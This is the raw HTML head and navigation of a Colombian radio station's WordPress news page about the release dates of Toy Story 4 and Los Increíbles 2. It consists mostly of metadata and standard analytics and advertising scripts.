


<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" prefix="" lang="es-ES" xmlns:fb="https://www.facebook.com/2008/fbml" xmlns:addthis="https://www.addthis.com/help/api-spec" >
<head>
 
<link href="https://fonts.googleapis.com/css?family=Oswald:400,700" rel="stylesheet"> 

<meta charset="UTF-8" >
<meta name="viewport" id="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0, user-scalable=no" />
<meta name="google-site-verification" content="BiCMeAmnDHMuWuOA-7xWZoN8vJXHOw5W-YBuoQ5XRwE" />
    

<link rel="shortcut icon" href="http://www.rumba.com.co/wp-content/media//icono16x16_2.png" /><link rel="alternate" type="application/rss+xml" title="RSS 2.0" href="http://www.rumba.com.co/feed/" />
<link rel="alternate" type="text/xml" title="RSS .92" href="http://www.rumba.com.co/feed/rss/" />
<link rel="alternate" type="application/atom+xml" title="Atom 0.3" href="http://www.rumba.com.co/feed/atom/" />
<link rel="pingback" href="http://www.rumba.com.co/xmlrpc.php" />

<meta property="og:image" content="http://www.rumba.com.co/wp-content/media//toy-story-4-los-increibles-2-fechas-estreno-660x400.jpg" />

<meta property="og:type" content="article" />
<meta property="og:description" content="Disney dio a conocer oficialmente las fechas de estrenos de dos de sus películas mas importantes: El estreno de Los Increíbles 2 será el próximo 15 de julio de 2018. Por su parte Toy Story 4 llegará a las salas de cine el próximo 21 de junio del 2019." />
<meta name="twitter:card" content="summary">
<meta name="twitter:url" content="http://www.rumba.com.co/musica/toy-story-4-y-los-increibles-2-ya-tienen-fecha-de-estreno/">
<meta name="twitter:title" content="Toy Story 4 y Los Increíbles 2 ya tienen fecha de estreno">
<meta name="twitter:description" content="Disney dio a conocer oficialmente las fechas de estrenos de dos de sus películas mas importantes: El estreno de Los Increíbles 2 será el próximo 15 de julio de 2018. Por su parte Toy Story 4 llegará a las salas de cine el próximo 21 de junio del 2019.">


<!-- BEGIN Metadata added by the Add-Meta-Tags WordPress plugin -->
<meta name="robots" content="noodp,noydir" />
<meta name="description" content="Disney dio a conocer oficialmente las fechas de estrenos de dos de sus películas mas importantes: El estreno de Los Increíbles 2 será el próximo 15 de julio de 2018. Por su parte Toy Story 4 llegará a las salas de cine el próximo 21 de junio del 2019." />
<meta name="keywords" content="rumba, rcn radio, bogotá 105.4 fm, barbosa 98.2 fm, barranquilla 99.1 fm, cali 97.5 fm, caucasia 91.3 fm, medellín 106.3 fm, ocaña 100.3 fm, planeta rica 97.5 fm, valledupar 100.7 fm barranca 87.7 fm, bucaramanga 103.7 fm, cartagena 102.5 fm, ibagué 88.3 fm, montería 97.5 fm, riohacha 93.7 fm, san andrés 100.5 fm, santa marta 106.9 fm, tumaco 91.1 fm, música, los increibles, toy story" />
<meta property="og:site_name" content="Rumba" />
<meta property="og:type" content="article" />
<meta property="og:title" content="Toy Story 4 y Los Increíbles 2 ya tienen fecha de estreno" />
<meta property="og:url" content="http://www.rumba.com.co/musica/toy-story-4-y-los-increibles-2-ya-tienen-fecha-de-estreno/" />
<meta property="og:description" content="Disney dio a conocer oficialmente las fechas de estrenos de dos de sus películas mas importantes: El estreno de Los Increíbles 2 será el próximo 15 de julio de 2018. Por su parte Toy Story 4 llegará a las salas de cine el próximo 21 de junio del 2019." />
<meta property="og:locale" content="es_ES" />
<meta property="og:updated_time" content="2018-03-04T13:55:11+00:00" />
<meta property="og:image" content="http://www.rumba.com.co/wp-content/media//toy-story-4-los-increibles-2-fechas-estreno.jpg" />
<meta property="og:image:width" content="1100" />
<meta property="og:image:height" content="600" />
<meta property="og:image:type" content="image/jpeg" />
<meta property="og:image" content="http://www.rumba.com.co/wp-content/media//69a43582e281ef9dbf35c1c2e6f1e22c.jpg" />
<meta property="og:image:width" content="736" />
<meta property="og:image:height" content="1104" />
<meta property="og:image:type" content="image/jpeg" />
<meta property="og:image" content="http://www.rumba.com.co/wp-content/media//p12004128_p_v8_aa.jpg" />
<meta property="og:image:width" content="960" />
<meta property="og:image:height" content="1440" />
<meta property="og:image:type" content="image/jpeg" />
<meta property="article:published_time" content="2017-07-18T09:13:30+00:00" />
<meta property="article:modified_time" content="2018-03-04T13:55:11+00:00" />
<meta property="article:author" content="http://www.rumba.com.co/author/cmacias/" />
<meta property="article:publisher" content="http://www.rumba.com.co/" />
<meta property="article:section" content="Música" />
<meta property="article:tag" content="rumba" />
<meta property="article:tag" content="rcn radio" />
<meta property="article:tag" content="bogotá 105.4 fm" />
<meta property="article:tag" content="barbosa 98.2 fm" />
<meta property="article:tag" content="barranquilla 99.1 fm" />
<meta property="article:tag" content="cali 97.5 fm" />
<meta property="article:tag" content="caucasia 91.3 fm" />
<meta property="article:tag" content="medellín 106.3 fm" />
<meta property="article:tag" content="ocaña 100.3 fm" />
<meta property="article:tag" content="planeta rica 97.5 fm" />
<meta property="article:tag" content="valledupar 100.7 fm barranca 87.7 fm" />
<meta property="article:tag" content="bucaramanga 103.7 fm" />
<meta property="article:tag" content="cartagena 102.5 fm" />
<meta property="article:tag" content="ibagué 88.3 fm" />
<meta property="article:tag" content="montería 97.5 fm" />
<meta property="article:tag" content="riohacha 93.7 fm" />
<meta property="article:tag" content="san andrés 100.5 fm" />
<meta property="article:tag" content="santa marta 106.9 fm" />
<meta property="article:tag" content="tumaco 91.1 fm" />
<meta property="article:tag" content="música" />
<meta property="article:tag" content="los increibles" />
<meta property="article:tag" content="toy story" />
<meta name="twitter:card" content="summary" />
<meta name="twitter:title" content="Toy Story 4 y Los Increíbles 2 ya tienen fecha de estreno" />
<meta name="twitter:description" content="Disney dio a conocer oficialmente las fechas de estrenos de dos de sus películas mas importantes: El estreno de Los Increíbles 2 será el próximo 15 de julio de 2018. Por su parte Toy Story 4 llegará a las salas de cine el próximo 21 de junio del 2019." />
<meta name="twitter:image:src" content="http://www.rumba.com.co/wp-content/media//toy-story-4-los-increibles-2-fechas-estreno.jpg" />
<meta name="twitter:image:width" content="1100" />
<meta name="twitter:image:height" content="600" />
<meta name="dcterms:title" content="Toy Story 4 y Los Increíbles 2 ya tienen fecha de estreno" />
<meta name="dcterms:identifier" content="http://www.rumba.com.co/musica/toy-story-4-y-los-increibles-2-ya-tienen-fecha-de-estreno/" />
<meta name="dcterms:creator" content="Macías, Cristian" />
<meta name="dcterms:created" content="2017-07-18T09:13:30+00:00" />
<meta name="dcterms:available" content="2017-07-18T09:13:30+00:00" />
<meta name="dcterms:modified" content="2018-03-04T13:55:11+00:00" />
<meta name="dcterms:description" content="Disney dio a conocer oficialmente las fechas de estrenos de dos de sus películas mas importantes: El estreno de Los Increíbles 2 será el próximo 15 de julio de 2018. Por su parte Toy Story 4 llegará a las salas de cine el próximo 21 de junio del 2019." />
<meta name="dcterms:subject" content="rumba" />
<meta name="dcterms:subject" content="rcn radio" />
<meta name="dcterms:subject" content="bogotá 105.4 fm" />
<meta name="dcterms:subject" content="barbosa 98.2 fm" />
<meta name="dcterms:subject" content="barranquilla 99.1 fm" />
<meta name="dcterms:subject" content="cali 97.5 fm" />
<meta name="dcterms:subject" content="caucasia 91.3 fm" />
<meta name="dcterms:subject" content="medellín 106.3 fm" />
<meta name="dcterms:subject" content="ocaña 100.3 fm" />
<meta name="dcterms:subject" content="planeta rica 97.5 fm" />
<meta name="dcterms:subject" content="valledupar 100.7 fm barranca 87.7 fm" />
<meta name="dcterms:subject" content="bucaramanga 103.7 fm" />
<meta name="dcterms:subject" content="cartagena 102.5 fm" />
<meta name="dcterms:subject" content="ibagué 88.3 fm" />
<meta name="dcterms:subject" content="montería 97.5 fm" />
<meta name="dcterms:subject" content="riohacha 93.7 fm" />
<meta name="dcterms:subject" content="san andrés 100.5 fm" />
<meta name="dcterms:subject" content="santa marta 106.9 fm" />
<meta name="dcterms:subject" content="tumaco 91.1 fm" />
<meta name="dcterms:subject" content="música" />
<meta name="dcterms:subject" content="los increibles" />
<meta name="dcterms:subject" content="toy story" />
<meta name="dcterms:language" content="es-ES" />
<meta name="dcterms:publisher" content="http://www.rumba.com.co/" />
<meta name="dcterms:rights" content="http://www.rumba.com.co/" />
<meta name="dcterms:coverage" content="World" />
<meta name="dcterms:type" content="Text" />
<meta name="dcterms:format" content="text/html" />
<meta name="dcterms:hasPart" content="http://www.rumba.com.co/musica/toy-story-4-y-los-increibles-2-ya-tienen-fecha-de-estreno/attachment/69a43582e281ef9dbf35c1c2e6f1e22c/" />
<meta name="dcterms:hasPart" content="http://www.rumba.com.co/musica/toy-story-4-y-los-increibles-2-ya-tienen-fecha-de-estreno/attachment/p12004128_p_v8_aa/" />
<meta name="dcterms:hasPart" content="http://www.rumba.com.co/musica/toy-story-4-y-los-increibles-2-ya-tienen-fecha-de-estreno/attachment/toy-story-4-los-increibles-2-fechas-estreno/" />
<link rel="publisher" type="text/html" title="Rumba" href="http://www.rumba.com.co/" />
<link rel="author" type="text/html" title="Cristian Macías" href="http://www.rumba.com.co/author/cmacias/" />
<!-- END Metadata added by the Add-Meta-Tags WordPress plugin -->

<title>Toy Story 4 y Los Increíbles 2 ya tienen fecha de estreno &#8211; Rumba</title>
<link rel='dns-prefetch' href='//ajax.googleapis.com' />
<link rel='dns-prefetch' href='//netdna.bootstrapcdn.com' />
<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="Rumba &raquo; Feed" href="http://www.rumba.com.co/feed/" />
<link rel="alternate" type="application/rss+xml" title="Rumba &raquo; RSS de los comentarios" href="http://www.rumba.com.co/comments/feed/" />
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.4\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.4\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/www.rumba.com.co\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.9.3"}};
			!function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55357,56692,8205,9792,65039],[55357,56692,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
<link rel='stylesheet' id='jquery-style-css'  href='http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.2/themes/smoothness/jquery-ui.css?ver=4.9.3' type='text/css' media='all' />
<link rel='stylesheet' id='photospace-styles-css'  href='http://www.rumba.com.co/wp-content/plugins/photospace/gallery.css?ver=4.9.3' type='text/css' media='all' />
<link rel='stylesheet' id='program-schedule-css'  href='http://www.rumba.com.co/wp-content/plugins/radio-station/templates/program-schedule.css?ver=4.9.3' type='text/css' media='all' />
<link rel='stylesheet' id='dj-widget-css'  href='http://www.rumba.com.co/wp-content/plugins/radio-station/templates/djonair.css?ver=4.9.3' type='text/css' media='all' />
<link rel='stylesheet' id='wp-polls-css'  href='http://www.rumba.com.co/wp-content/plugins/wp-polls/polls-css.css?ver=2.73.8' type='text/css' media='all' />
<style id='wp-polls-inline-css' type='text/css'>
.wp-polls .pollbar {
	margin: 1px;
	font-size: 8px;
	line-height: 10px;
	height: 10px;
	background: #900;
	border: 1px solid #c8c8c8;
}

</style>
<!--[if lt IE 9]>
<link rel='stylesheet' id='iecss-css'  href='http://www.rumba.com.co/wp-content/themes/topnews/css/iecss.css?ver=4.9.3' type='text/css' media='all' />
<![endif]-->
<link rel='stylesheet' id='mvp-style-css'  href='http://www.rumba.com.co/wp-content/themes/topnews/style.css?ver=4.9.3' type='text/css' media='all' />
<link rel='stylesheet' id='reset-css'  href='http://www.rumba.com.co/wp-content/themes/topnews/css/reset.css?ver=4.9.3' type='text/css' media='all' />
<link rel='stylesheet' id='mvp-fontawesome-css'  href='//netdna.bootstrapcdn.com/font-awesome/4.4.0/css/font-awesome.css?ver=4.9.3' type='text/css' media='all' />
<link rel='stylesheet' id='media-queries-css'  href='http://www.rumba.com.co/wp-content/themes/topnews/css/media-queries.css?ver=4.9.3' type='text/css' media='all' />
<link rel='stylesheet' id='studio-fonts-css'  href='//fonts.googleapis.com/css?family=Open+Sans%3A700%2C800%26subset%3Dlatin%2Clatin-ext&#038;ver=1.0.0' type='text/css' media='all' />
<link rel='stylesheet' id='addthis_all_pages-css'  href='http://www.rumba.com.co/wp-content/plugins/addthis/frontend/build/addthis_wordpress_public.min.css?ver=4.9.3' type='text/css' media='all' />
<script type='text/javascript' src='http://www.rumba.com.co/wp-content/plugins/jquery-updater/js/jquery-3.2.1.min.js?ver=3.2.1'></script>
<script type='text/javascript' src='http://www.rumba.com.co/wp-content/plugins/jquery-updater/js/jquery-migrate-3.0.0.min.js?ver=3.0.0'></script>
<script type='text/javascript' src='http://www.rumba.com.co/wp-content/plugins/photospace/jquery.galleriffic.js?ver=4.9.3'></script>
<link rel='https://api.w.org/' href='http://www.rumba.com.co/wp-json/' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://www.rumba.com.co/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://www.rumba.com.co/wp-includes/wlwmanifest.xml" /> 
<meta name="generator" content="WordPress 4.9.3" />
<link rel="canonical" href="http://www.rumba.com.co/musica/toy-story-4-y-los-increibles-2-ya-tienen-fecha-de-estreno/" />
<link rel='shortlink' href='http://www.rumba.com.co/?p=47792' />
<link rel="alternate" type="application/json+oembed" href="http://www.rumba.com.co/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fwww.rumba.com.co%2Fmusica%2Ftoy-story-4-y-los-increibles-2-ya-tienen-fecha-de-estreno%2F" />
<link rel="alternate" type="text/xml+oembed" href="http://www.rumba.com.co/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fwww.rumba.com.co%2Fmusica%2Ftoy-story-4-y-los-increibles-2-ya-tienen-fecha-de-estreno%2F&#038;format=xml" />
			<meta property="fb:pages" content="167767896594991" />
							<meta property="ia:markup_url" content="http://www.rumba.com.co/musica/toy-story-4-y-los-increibles-2-ya-tienen-fecha-de-estreno/?ia_markup=1" />
				<!--	photospace [ START ] --> 
<style type="text/css">
			.photospace .thumnail_col a.pageLink {
				width:50px;
				height:50px;
			}
			.photospace .gal_content,
				.photospace .loader,
				.photospace .slideshow a.advance-link{
					width:600px;
				}
			.photospace{
					width:600px;
				}
			.photospace{
					height:300px;
				}
			.photospace ul.thumbs li {
					margin-bottom:10px !important;
					margin-right:10px !important; 
				}
			.photospace .loader {
					height: 150px;
				}
			.photospace .loader {
					width: 600px;
				}
			.photospace .slideshow a.advance-link,
				.photospace .slideshow span.image-wrapper {
					height:300px;
				}
			.photospace .slideshow-container {
					height:300px;
				}
		
			.photospace .thumnail_col{
				display:none !important;
			}
		</style><!--	photospace [ END ] --> 

<style type='text/css'>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</style>
	
<style type="text/css">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</style>

<style type="text/css">
</style>

<script data-cfasync="false" type="text/javascript">if (window.addthis_product === undefined) { window.addthis_product = "wpp"; } if (window.wp_product_version === undefined) { window.wp_product_version = "wpp-6.1.2"; } if (window.wp_blog_version === undefined) { window.wp_blog_version = "4.9.3"; } if (window.addthis_share === undefined) { window.addthis_share = {"passthrough":{"twitter":{"via":"RUMBABOGOTAFM"}}}; } if (window.addthis_config === undefined) { window.addthis_config = {"data_track_clickback":true,"ignore_server_config":true,"data_ga_property":"UA-2370603-1","data_ga_social":true,"ui_language":"es","ui_atversion":300}; } if (window.addthis_layers === undefined) { window.addthis_layers = {}; } if (window.addthis_layers_tools === undefined) { window.addthis_layers_tools = [{"sharetoolbox":{"numPreferredServices":5,"thirdPartyButtons":true,"services":"facebook_like,tweet,pinterest_pinit,counter","elements":".addthis_inline_share_toolbox_below,.at-below-post,.at-below-post-page"}}]; } else { window.addthis_layers_tools.push({"sharetoolbox":{"numPreferredServices":5,"thirdPartyButtons":true,"services":"facebook_like,tweet,pinterest_pinit,counter","elements":".addthis_inline_share_toolbox_below,.at-below-post,.at-below-post-page"}});  } if (window.addthis_plugin_info === undefined) { window.addthis_plugin_info = {"info_status":"enabled","cms_name":"WordPress","plugin_name":"Share Buttons by AddThis","plugin_version":"6.1.2","plugin_mode":"WordPress","anonymous_profile_id":"wp-13d17445a2fe8b518aefe944508f2ef5","page_info":{"template":"posts","post_type":""},"sharing_enabled_on_post_via_metabox":false}; } 
                    (function() {
                      var first_load_interval_id = setInterval(function () {
                        if (typeof window.addthis !== 'undefined') {
                          window.clearInterval(first_load_interval_id);
                          if (typeof window.addthis_layers !== 'undefined' && Object.getOwnPropertyNames(window.addthis_layers).length > 0) {
                            window.addthis.layers(window.addthis_layers);
                          }
                          if (Array.isArray(window.addthis_layers_tools)) {
                            for (i = 0; i < window.addthis_layers_tools.length; i++) {
                              window.addthis.layers(window.addthis_layers_tools[i]);
                            }
                          }
                        }
                     },1000)
                    }());
                </script> <script data-cfasync="false" type="text/javascript"src="https://s7.addthis.com/js/300/addthis_widget.js#pubid=ra-4ede507310bb80c0" async="async"></script>
<!-- Google Tag Manager -->
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-PK93HN');</script>
<!-- End Google Tag Manager -->

<!-- add Cxense script begin -->
<script>
   var cX = cX || {}; cX.callQueue = cX.callQueue || [];
   cX.callQueue.push(['setSiteId', '1145198960993067304' ]);
    cX.callQueue.push(['sendPageViewEvent']);
</script>
<script>
    // Async load of cx.js
  (function(d,s,e,t){e=d.createElement(s);e.type='text/java'+s;e.async='async';
  e.src='http'+('https:'===location.protocol?'s://s':'://')+'cdn.cxense.com/cx.js';
  t=d.getElementsByTagName(s)[0];t.parentNode.insertBefore(e,t);})(document,'script');
</script>
<!-- End Cxense script begin -->

<!-- Facebook Pixel Code -->
<script>
!function(f,b,e,v,n,t,s){if(f.fbq)return;n=f.fbq=function(){n.callMethod?
n.callMethod.apply(n,arguments):n.queue.push(arguments)};if(!f._fbq)f._fbq=n;
n.push=n;n.loaded=!0;n.version='2.0';n.queue=[];t=b.createElement(e);t.async=!0;
t.src=v;s=b.getElementsByTagName(e)[0];s.parentNode.insertBefore(t,s)}(window,
document,'script','https://connect.facebook.net/en_US/fbevents.js');
fbq('init', '1042561075867288'); // Insert your pixel ID here.
fbq('track', 'PageView');
</script>
<noscript><img height="1" width="1" style="display:none"
src="https://www.facebook.com/tr?id=1042561075867288&ev=PageView&noscript=1"
/></noscript>
<!-- DO NOT MODIFY -->
<!-- End Facebook Pixel Code -->

<script>
fbq('track', 'ViewContent', {
value: 1,
currency: 'USD'
});
</script>

<!-- IMPLEMENTACION GOOGLEADS JUNIO 5 -->
<script async='async' src='https://www.googletagservices.com/tag/js/gpt.js'></script>
<script>
  var googletag = googletag || {};
  googletag.cmd = googletag.cmd || [];
</script>


<script>
 var cX = cX || {}; cX.callQueue = cX.callQueue || [];
    cX.callQueue.push(['invoke', function() {
    googletag.cmd.push(function() {

<!-- HOME -->
googletag.defineSlot('/205320464/RUMBA/HOME/RUMBA_Home_BarraExpander_DM', [[728, 90], [320, 100], [320, 50], [990, 90]], 'div-gpt-ad-1502839120653-0').addService(googletag.pubads());
googletag.defineSlot('/205320464/RUMBA/HOME/RUMBA_Home_Boton1_DM', [[300, 100], [320, 100], [300, 250], [320, 50]], 'div-gpt-ad-1491336331866-1').addService(googletag.pubads());
googletag.defineSlot('/205320464/RUMBA/HOME/RUMBA_Home_Boton2_DM', [[300, 100], [300, 250]], 'div-gpt-ad-1491336331866-2').addService(googletag.pubads());
googletag.defineSlot('/205320464/RUMBA/HOME/RUMBA_Home_Boton3_DM', [[300, 100], [320, 100], [300, 250], [320, 50]], 'div-gpt-ad-1491336331866-3').addService(googletag.pubads());
googletag.defineSlot('/205320464/RUMBA/HOME/RUMBA_Home_FooterBanner_970x90_D', [[990, 90], [728, 90], [970, 90]], 'div-gpt-ad-1491336331866-4').addService(googletag.pubads());
googletag.defineSlot('/205320464/RUMBA/HOME/RUMBA_Home_Fullbanner_D', [620, 70], 'div-gpt-ad-1491336331866-5').addService(googletag.pubads());
    googletag.defineSlot('/205320464/RUMBA/HOME/RUMBA_Home_LayerFijoalScroll_DM', [[990, 40], [320, 50]], 'div-gpt-ad-1493326612948-0').addService(googletag.pubads());
googletag.defineOutOfPageSlot('/205320464/RUMBA/HOME/RUMBA_Home_OutofPage_DM', 'div-gpt-ad-1491336331866-7').addService(googletag.pubads());
googletag.defineSlot('/205320464/RUMBA/HOME/RUMBA_Home_RascacieloDerecho_161x600_D', [[160, 600], [161, 600]], 'div-gpt-ad-1491336331866-8').addService(googletag.pubads());
googletag.defineSlot('/205320464/RUMBA/HOME/RUMBA_Home_RascacieloIzquierdo_160x600_D', [160, 600], 'div-gpt-ad-1491336331866-9').addService(googletag.pubads());
googletag.defineSlot('/205320464/RUMBA/HOME/RUMBA_Home_Richmedia_DM', [1, 1], 'div-gpt-ad-1491336331866-10').addService(googletag.pubads());
googletag.defineSlot('/205320464/RUMBA/HOME/RUMBA_Home_Robapagina1_300x250_DM', [300, 250], 'div-gpt-ad-1491336331866-11').addService(googletag.pubads());



<!-- INTERNAS -->
googletag.defineSlot('/205320464/RUMBA/INTERNAS/RUMBA_Internas_BarraExpander_DM', [[728, 90], [320, 50], [990, 90], [320, 100]], 'div-gpt-ad-1491336401500-0').addService(googletag.pubads());
googletag.defineSlot('/205320464/RUMBA/INTERNAS/RUMBA_Internas_Boton1_DM', [[300, 250], [300, 100], [320, 50], [320, 100]], 'div-gpt-ad-1491336401500-1').addService(googletag.pubads());
googletag.defineSlot('/205320464/RUMBA/INTERNAS/RUMBA_Internas_Boton2_DM', [[300, 100], [300, 250]], 'div-gpt-ad-1491336401500-2').addService(googletag.pubads());
googletag.defineSlot('/205320464/RUMBA/INTERNAS/RUMBA_Internas_Boton3_DM', [[300, 250], [300, 100], [320, 50], [320, 100]], 'div-gpt-ad-1491336401500-3').addService(googletag.pubads());
googletag.defineSlot('/205320464/RUMBA/INTERNAS/RUMBA_Internas_FooterBanner_970x90_D', [970, 90], 'div-gpt-ad-1491336401500-4').addService(googletag.pubads());
googletag.defineSlot('/205320464/RUMBA/INTERNAS/RUMBA_Internas_Fullbanner_D', [620, 70], 'div-gpt-ad-1491336401500-5').addService(googletag.pubads());
googletag.defineSlot('/205320464/RUMBA/INTERNAS/RUMBA_Internas_LayerFijoalScroll_DM', [[320, 50], [990, 40]], 'div-gpt-ad-1491336401500-6').addService(googletag.pubads());
googletag.defineOutOfPageSlot('/205320464/RUMBA/INTERNAS/RUMBA_Internas_OutofPage_DM', 'div-gpt-ad-1491336401500-7').addService(googletag.pubads());
googletag.defineSlot('/205320464/RUMBA/INTERNAS/RUMBA_Internas_RascacieloDerecho_161x600_D', [[160, 600], [161, 600]], 'div-gpt-ad-1491336401500-8').addService(googletag.pubads());
googletag.defineSlot('/205320464/RUMBA/INTERNAS/RUMBA_Internas_RascacieloIzquierdo_160x600_D', [160, 600], 'div-gpt-ad-1491336401500-9').addService(googletag.pubads());
googletag.defineSlot('/205320464/RUMBA/INTERNAS/RUMBA_Internas_Richmedia_DM', [1, 1], 'div-gpt-ad-1491336401500-10').addService(googletag.pubads());
googletag.defineSlot('/205320464/RUMBA/INTERNAS/RUMBA_Internas_Robapagina1_300x250_DM', [300, 250], 'div-gpt-ad-1491336401500-11').addService(googletag.pubads());
googletag.defineSlot('/205320464/RUMBA/INTERNAS/RUMBA_Internas_InRead_DM', [1, 1], 'div-gpt-ad-1511453077513-0').addService(googletag.pubads());



<!-- FIN -->
        googletag.pubads().enableSingleRequest();
        googletag.pubads().collapseEmptyDivs();
        googletag.pubads().setTargeting("CxSegments", cX.getUserSegmentIds({persistedQueryId: '8cc43efd880a7e7e81673c58c29a25ca2c7ec304' }));
        googletag.enableServices();
	 })
    }]);  
  </script>


<!--FIN  IMPLEMENTACION GOOGLEADS JUNIO 5 -->


</head>

<body class="post-template-default single single-post postid-47792 single-format-standard">
	
<!-- Google Tag Manager (noscript) -->
<noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-PK93HN"
height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript>
<!-- End Google Tag Manager (noscript) -->

	<div id="fb-root"></div>
	<script>(function(d, s, id) {
	  var js, fjs = d.getElementsByTagName(s)[0];
	  if (d.getElementById(id)) return;
	  js = d.createElement(s); js.id = id;
	  js.src = "//connect.facebook.net/es_LA/sdk.js#xfbml=1&version=v2.7&appId=1680066125644972";
	  fjs.parentNode.insertBefore(js, fjs);
	}(document, 'script', 'facebook-jssdk'));</script>

	<div id="wallpaper">
			</div><!--wallpaper-->
<div id="site">        
	<div id="fly-wrap">
	<div class="fly-wrap-out">
		<div class="fly-side-wrap">
			<ul class="fly-bottom-soc left relative">
									<li class="fb-soc">
						<a href="https://www.facebook.com/RUMBAST105.4" target="_blank">
						<i class="fa fa-facebook-square fa-2"></i>
						</a>
					</li>
													<li class="twit-soc">
						<a href="https://twitter.com/rumbabogotafm" target="_blank">
						<i class="fa fa-twitter fa-2"></i>
						</a>
					</li>
																	<li class="inst-soc">
						<a href="https://www.instagram.com/rumbabogotafm/" target="_blank">
						<i class="fa fa-instagram fa-2"></i>
						</a>
					</li>
																													<li class="rss-soc">
						<a href="http://www.rumba.com.co/feed/rss/" target="_blank">
						<i class="fa fa-rss fa-2"></i>
						</a>
					</li>
							</ul>
		</div><!--fly-side-wrap-->
		<div class="fly-wrap-in">
			<div id="fly-menu-wrap">
				<nav class="fly-nav-menu left relative">
					<div class="menu-menurumba-container"><ul id="menu-menurumba" class="menu"><li id="menu-item-38340" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-38340"><a href="http://www.rumba.com.co/">Inicio</a></li>
<li id="menu-item-40186" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-40186"><a target="_blank" href="http://www.rcnmundo.com/rumba">Radio en Vivo</a>
<ul class="sub-menu">
	<li id="menu-item-41438" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-41438"><a href="http://www.rcnmundo.com/rumbabogota">Rumba Bogotá</a></li>
	<li id="menu-item-41439" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-41439"><a href="http://www.rcnmundo.com/rumbamedellin">Rumba Medellín</a></li>
	<li id="menu-item-41440" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-41440"><a href="http://www.rcnmundo.com/rumbacali">Rumba Cali</a></li>
	<li id="menu-item-41441" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-41441"><a href="http://www.rcnmundo.com/rumbabarranquilla">Rumba Barranquilla</a></li>
	<li id="menu-item-41442" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-41442"><a href="http://www.rcnmundo.com/rumbabucaramanga">Rumba Bucaramanga</a></li>
	<li id="menu-item-43970" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-43970"><a href="http://www.rcnmundo.com/rumbasanandres">Rumba San Andrés</a></li>
</ul>
</li>
<li id="menu-item-41062" class="mega-dropdown menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-41062"><a href="http://www.rumba.com.co/seccion/noticias/">Noticias</a>
<ul class="sub-menu">
	<li id="menu-item-40360" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-40360"><a href="http://www.rumba.com.co/seccion/musica/">Música</a></li>
	<li id="menu-item-41063" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-41063"><a href="http://www.rumba.com.co/seccion/deportes/">Deportes</a></li>
	<li id="menu-item-41065" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-41065"><a href="http://www.rumba.com.co/seccion/hot/">Hot</a></li>
